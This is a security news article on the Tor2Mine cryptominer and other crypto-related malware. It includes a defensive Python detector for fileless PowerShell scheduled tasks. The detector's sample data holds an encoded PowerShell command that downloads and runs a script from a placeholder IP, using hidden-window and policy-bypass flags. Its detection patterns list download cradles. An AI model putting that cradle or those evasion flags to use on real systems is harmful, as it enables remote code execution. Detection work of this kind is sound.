As cryptocurrency has gained popularity among online users, cybercriminals have realized the value of cryptocurrency mining campaigns. Read on to know more…
As cryptocurrency has grown in popularity among online users, cryptocurrency mining campaigns have taken centre stage in the threat landscape. Since cryptomining campaigns have proven to be financially lucrative for cybercriminals, they continue to develop new TTPs and malware strains. One such miner variant has reappeared in a more powerful form, as discovered by Sophos.
The new Tor2Mine variant is a Monero miner that has been operating since at least 2019 and can take advantage of huge networks of worker machines.
The malware authors continue to upgrade the miner as they find new strategies to evade detection and maintain persistence on compromised machines.
Working Mechanism
Tor2Mine disables anti-malware measures, deploys the payload, and steals Windows credentials using a PowerShell script.
If it is able to gain admin privileges, Tor2Mine installs its executables as a service and looks for other machines on the network to propagate to.
If it is unable to gain admin credentials, the miner runs filelessly, executing its commands as scheduled tasks.
The presence of miners on a network means that other, potentially more dangerous, intrusions are on the way. Tor2Mine also appears to be more aggressive than its competitors: once it has established persistence, it can only be removed with the help of endpoint protection and other anti-malware software, and its lateral movement functionality lets it continue infecting systems even if the C2 server goes offline.
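The fileless scheduled-task launch described above leaves a trace a defender can check for. The following is an added example, not code from Sophos or from the article: it inspects constructed Windows Security 4698 (scheduled task created) events for a PowerShell action that hides its window, bypasses execution policy, or carries an encoded or downloaded payload; the IP in the sample is a TEST-NET placeholder.

```python
import base64
import re
import xml.etree.ElementTree as ET

# Constructed sample: two Windows Security 4698 (scheduled task created) events,
# reduced to the fields a SIEM forwards. Not real telemetry; the IP is a TEST-NET address.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/x.ps1')"
_ENCODED = base64.b64encode(_CRADLE.encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"EventID": 4698, "TaskName": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "TaskContent": "<Task><Actions><Exec><Command>%windir%\\system32\\defrag.exe</Command>"
                    "<Arguments>-c -h -o -$</Arguments></Exec></Actions></Task>"},
    {"EventID": 4698, "TaskName": r"\Updater",
     "TaskContent": "<Task><Actions><Exec><Command>powershell.exe</Command><Arguments>"
                    f"-w hidden -nop -ep bypass -enc {_ENCODED}</Arguments></Exec></Actions></Task>"},
]

# Traits of a fileless PowerShell launch: no script on disk, payload supplied as an
# encoded string or fetched at run time, console hidden and policy checks bypassed.
FILELESS_FLAGS = [
    (re.compile(r"-(e|ec|enc|encodedcommand)\b", re.I), "encoded command"),
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"iex|invoke-expression|downloadstring|net\.webclient|invoke-webrequest", re.I), "download cradle"),
]

def decode_encoded_command(args):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or ''."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", args, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""

def inspect_task(event):
    """Return the fileless-PowerShell indicators present in one 4698 event."""
    if event.get("EventID") != 4698:
        return []
    root = ET.fromstring(event["TaskContent"])
    hits = []
    # Real TaskContent carries an XML namespace, so match on the local tag name only.
    for exe in (el for el in root.iter() if el.tag.rsplit("}", 1)[-1] == "Exec"):
        fields = {c.tag.rsplit("}", 1)[-1]: (c.text or "") for c in exe}
        if not re.search(r"(powershell|pwsh)(\.exe)?$", fields.get("Command", "").strip(), re.I):
            continue  # only PowerShell launches are in scope here
        args = fields.get("Arguments", "")
        text = args + " " + decode_encoded_command(args)  # scan the decoded payload too
        hits.extend(label for rx, label in FILELESS_FLAGS if rx.search(text))
    return hits
```

A task that returns no indicators is not cleared, only unremarkable on these four traits; the hits list is meant to feed a triage queue, not replace endpoint protection.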
Latest Cryptomining Threats
Tor2Mine isn’t the only cryptominer to be wary of. Let’s take a look at some other recent incidents that are equally threatening.
The new Babadeda crypter has been discovered hijacking Discord channels to target the crypto, NFT, and DeFi communities. To make their payloads appear harmless, the allegedly Russian-based hackers are hiding them in application installers.
Some recent cryptomining activity has been attributed to a campaign propagating the SpyAgent malware. The malware was discovered exploiting Safib Assistant, a legitimate Russian remote access tool, and its dropper is spread through fake cryptocurrency-related websites.
Last month, researchers discovered a new Aggah campaign that used clipboard hijacking code to replace bitcoin addresses. In the attacks, Bitcoin, XMR, Ethereum, Doge, XLM, LTC, and XRP addresses were used.
A Brief Conclusion
According to Sophos, cryptominers are less likely to target firms that quickly patch vulnerabilities on internet-facing systems. As threats evolve, organizations must stay ahead of the game by deploying strong cybersecurity protections.